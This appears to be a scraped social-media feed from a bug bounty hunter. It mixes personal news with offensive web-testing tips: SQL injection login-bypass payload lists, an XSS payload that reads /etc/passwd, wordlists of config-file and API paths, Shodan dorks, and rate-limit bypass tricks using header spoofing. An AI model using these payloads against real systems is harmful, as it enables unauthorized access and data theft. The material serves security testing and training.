user avatar
Aditya
@ADITYASHENDE17
MS Cyber ๐Ÿ‡ฌ๐Ÿ‡ง | Work @BforeAI | @Bugcrowd Top 100 | Solo Bug Bounty Hunter/Trainer | Professional Biker | @kong_sec ๐Ÿ‡ฎ๐Ÿ‡ณ | Own Views โ‰  Employment |
Planet Earth
Born July 20
Joined April 2019
  • Pinned
    user avatar
    2000 points @Bugcrowd Good bounties & Good life
  • user avatar
    Happy to tell you. Got offer letter from cambridge campus university ARU , UK. Masters in cyber security + offensive security. I am travelling to UK after 6 months. So if there is physical meetup like nullcon, owasp meets etc . Will meet โค๏ธโค๏ธโค๏ธ
  • user avatar
  • user avatar
    Burpsuite extension to bypass 403 restricted directory. Installation BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh. github.com/sting8k/BurpSuโ€ฆ
  • user avatar
    or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'--
  • user avatar
    Few dorks which I use to find common bugs while testing. Add your so itโ€™ll help others ssl.cert.subject.CN:"*.target. com" http.title:"index of/" ssl.cert.subject.CN:"*.target. com" http.title:"gitlab" ssl.cert.subject.CN:"*.wur.nl" http.title:"gitlab"
  • user avatar
    /api/v1/account/accounts /api/v1/account/accounts/summaries /api/v1/account/oauth/token /api/v1/account/oauth/ticket /api/v1/account/permissions /api/v1/account/user /api/v1/account/user/assets /api/v1/account/user/delete /api/v1/account/user/profile
  • user avatar
    Payload: <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> Reference: blog.dixitaditya.com/xss-to-read-inโ€ฆ
  • user avatar
    /.config.php /.git/config ////../../data/config/microsrv.cfg //admin/config.php /admin/config.php /administrator/webconfig.txt.php /app.config /audit.config /Cassini.exe.config /ccnet.config /cgi-bin/config.exp /conceptual.config /config /config.inc /config.inc.php
  • user avatar
    Rate Limiting Bypass IP Rotation --> Sending new ip's Null byte -- %00,%0d%0a,%09 exapmple:email:[email protected]%00 4. X-Forwarded-For: IP ex:X-Forwarded-For: 127.0.0.1 5. Double X forward option ex: X-Forwarded-For: X-Forwarded-For:127.0.0.1
  • user avatar
    Finally my 3rd beast is hereโค๏ธโค๏ธ
  • user avatar
    Payloads para sql inyection login bypass ' or ''-' " or ""-" " or true-- ' or true-- admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* #payloads #payload #Bypass
  • user avatar
    Finally ๐Ÿ  construction completed with help of big bounties, investment, stock trade. And obviously farming ๐Ÿ˜๐Ÿ˜
  • user avatar